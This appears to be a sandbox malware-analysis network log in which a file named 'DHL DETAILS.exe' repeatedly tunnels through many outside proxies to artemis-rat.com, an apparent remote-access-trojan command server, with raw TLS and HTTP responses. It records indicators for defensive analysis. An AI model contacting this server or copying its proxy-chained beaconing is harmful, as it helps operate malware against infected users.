                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.535382986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1055192.168.2.553155185.220.226.2358086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.544670105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1056192.168.2.553229119.28.4.11299996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.545316935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1057192.168.2.553295192.154.244.9290006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.551070929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1058192.168.2.55327044.190.9.65481006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.555696964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1059192.168.2.55320514.103.24.2080006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.565795898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1060192.168.2.552625162.214.225.223634526352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.571980000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.676820993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1061192.168.2.5509258.213.128.9031296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.577318907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.912084103 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1062192.168.2.553210221.6.139.19090026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.589060068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.944087982 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1063192.168.2.553259159.223.71.71525426352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.601181030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.333204985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536539078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724096060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.833235025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.864337921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1064192.168.2.55266254.152.3.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.606316090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.826271057 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:16.890763998 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 97 e6 ae 88 5f c7 a7 17 82 30 d5 f3 a2 7f 70 0e 1b 69 77 0c 28 28 1d f3 36 6d ec de a1 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR_0piw((6m*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:17.109510899 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 fc 42 bc 37 49 e1 95 d6 7d 45 87 67 e3 6c f6 fc 3a d5 b5 9a e0 ec af 35 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9B7I}Egl:5DOWNGRD0000*H010Uartemis-rat.com0240309120649Z260309120649Z010Uartemis-rat.com0"0*H0)K].S*kC
                                                                                    Mar 9, 2024 13:14:17.109636068 CET536INData Raw: dc 87 a6 79 77 13 1b 72 1b 36 4c c0 5f 8d 99 ab 97 15 34 b2 fb 3d d9 eb de f8 f6 4f 8c e7 65 00 24 f8 e7 69 ff a2 cf 68 c7 c6 e8 f6 d3 90 a6 61 e1 b5 f8 d8 0d b3 9d 08 50 9a a5 6c 80 b3 79 5b 15 3f 26 42 dd 4f 6d f8 63 6e c7 ee 4d e7 01 5a b0 3b
                                                                                    Data Ascii: ywr6L_4=Oe$ihaPly[?&BOmcnMZ;oeB9yY:kPHwNOCGJ{B;,q@w 'v?\fUFL"XF+[-gzHw[&&^eK~+#(P>x,(
                                                                                    Mar 9, 2024 13:14:17.109872103 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 9, 2024 13:14:17.274828911 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 0a fd 15 2e e6 f9 67 92 f1 f3 8a a7 c5 e3 67 bd f2 29 ee e9 37 6d de 0e a6 3d f9 bb b8 4e 31 12 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 6b 0b cd bb 2a 95 b7 46 1c c8 e0 1b d5 4b 60 5b 8f 13 8c b9 25
                                                                                    Data Ascii: %! .gg)7m=N1(k*FK`[%^Jq6PO
                                                                                    Mar 9, 2024 13:14:17.490530968 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 5d a6 df ee cc a2 60 0c 4e 8f 70 7f 13 2b ed f0 69 5f 88 52 6c 52 06 f4 08 46 e9 04 14 f6 8e 3d 5a ee 92 97 45 8e d5 5f
                                                                                    Data Ascii: (]`Np+i_RlRF=ZE_


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1065192.168.2.553301192.111.134.1041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.606316090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1066192.168.2.55107451.15.254.129163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.635231972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.723897934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.723901987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.723790884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1067192.168.2.553243102.223.20.217806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.637934923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.019881964 CET493INHTTP/1.1 302 Found
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Location: https://repository.gij.edu.gh
                                                                                    Content-Length: 295
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 70 6f 73 69 74 6f 72 79 2e 67 69 6a 2e 65 64 75 2e 67 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://repository.gij.edu.gh">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1068192.168.2.55112491.121.106.5544446352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.645312071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.118191004 CET132INHTTP/1.1 503 Too many open connections
                                                                                    Content-Type: text/plain
                                                                                    Connection: close
                                                                                    Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                    Data Ascii: Maximum number of open connections reached.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1069192.168.2.55329193.190.142.57312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.660715103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.955491066 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1070192.168.2.55327243.131.246.77156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.688355923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1071192.168.2.55327145.11.95.16660026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.688606977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.053407907 CET228INHTTP/1.0 502 Bad Gateway
                                                                                    Connection: close
                                                                                    Content-type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1072192.168.2.55328394.177.106.17823246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.690614939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1073192.168.2.553288212.127.93.18580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.690682888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1074192.168.2.55331394.131.64.94583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.690820932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1075192.168.2.553184218.57.210.18690026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.703100920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.723849058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.091188908 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 11:56:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1076192.168.2.55116351.75.126.150341446352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.709964991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.780133009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1077192.168.2.55107094.45.74.6080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.715390921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1078192.168.2.5532628.209.255.1331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.718981981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.676876068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.769740105 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1079192.168.2.553282115.239.234.4373026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.737147093 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:17.088854074 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
